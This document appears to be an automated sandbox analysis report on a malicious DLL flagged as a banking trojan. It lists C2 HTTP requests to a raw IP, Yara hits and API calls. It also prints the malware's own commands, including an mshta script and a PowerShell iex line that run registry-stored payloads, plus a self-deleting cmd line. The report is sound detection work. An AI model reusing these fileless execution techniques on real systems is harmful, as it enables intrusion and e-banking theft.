                      Source: global trafficHTTP traffic detected: GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Source: Yara match | File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

System Summary

Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: VoevdOQpeU.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F821C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F198A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F475F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058184D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05808FA6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058237F4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05801E50
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581C3A9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05820B0E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581488B CreateProcessAsUserW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F3A9C NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F4695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F25D7 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F8441 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815D9D NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581F5FF memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815CA1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058144A5 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05801C78 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581312E RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058212F1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581AD9E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581B628 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581264B NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815188 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058029B2 NtGetContextThread,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0581C1C2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580A085 memset,NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05815830 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05801B92 NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05807A1E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
Source: VoevdOQpeU.dll | Binary or memory string: OriginalFilenamerpcapd.exe0 vs VoevdOQpeU.dll
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: VoevdOQpeU.dll | ReversingLabs: Detection: 38%
Source: VoevdOQpeU.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220423
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F57.tmp
Source: classification engine | Classification label: mal100.troj.evad.winDLL@29/23@0/2
Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F6DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{18B00793-9774-0A09-E1CC-BBDEA5C01FF2}
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{107D1110-2FAD-C278-3944-D3167DB8B7AA}
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: VoevdOQpeU.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb | source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb | source: loaddll32.exe, 00000000.00000000.287938913.0000000000480000.00000002.00000001.01000000.00000003.sdmp, VoevdOQpeU.dll
Source: Binary string: ntdll.pdbUGP | source: rundll32.exe, 00000002.00000003.370646090.0000000005D90000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049FB2FF push esi; retf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F820B push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_049F7E20 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_05812C1A push ecx; mov dword ptr [esp], 00000002h
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058237E3 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_058232B0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: bscdh0f0.dll.28.dr | Static PE information: real checksum: 0x0 should be: 0x5d5f
Source: poet0yxq.dll.26.dr | Static PE information: real checksum: 0x0 should be: 0xdf1c
Source: VoevdOQpeU.dll | Static PE information: real checksum: 0x872fe521 should be: 0xab1d3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll"
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
